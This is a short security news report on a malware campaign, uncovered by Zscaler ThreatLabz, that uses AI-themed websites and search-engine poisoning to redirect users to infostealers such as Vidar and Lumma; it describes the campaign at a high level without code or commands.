Cybercriminals are creating AI-themed websites that exploit search engine algorithms to manipulate rankings and achieve higher visibility in search results.

Researchers from Zscaler ThreatLabz recently uncovered a sophisticated cyber campaign that exploits public interest in popular AI tools such as ChatGPT and Luma AI. Threat actors have created AI-themed websites that use Black Hat SEO techniques to manipulate search engine rankings, making these malicious sites appear prominently in results for trending AI-related queries.

When users search for terms associated with these AI platforms, they may encounter these poisoned results. Clicking on the links leads to a complex redirection chain, often using JavaScript, which ultimately delivers malware payloads such as Vidar Stealer, Lumma Stealer, and Legion Loader. These malware types are known for stealing sensitive information, including cryptocurrency credentials, and are sometimes delivered via large installer files to bypass security sandboxes.

The campaign also employs browser fingerprinting to collect detailed information about the user’s device—such as browser version, screen resolution, user agent, and cookies—before redirecting them to the final malware download page. The attackers use legitimate platforms like AWS CloudFront to host their scripts, making the malicious activities harder to detect.

This campaign highlights how cybercriminals are leveraging the hype around AI tools to trick users, underscoring the need for vigilance when searching for or downloading software related to trending technologies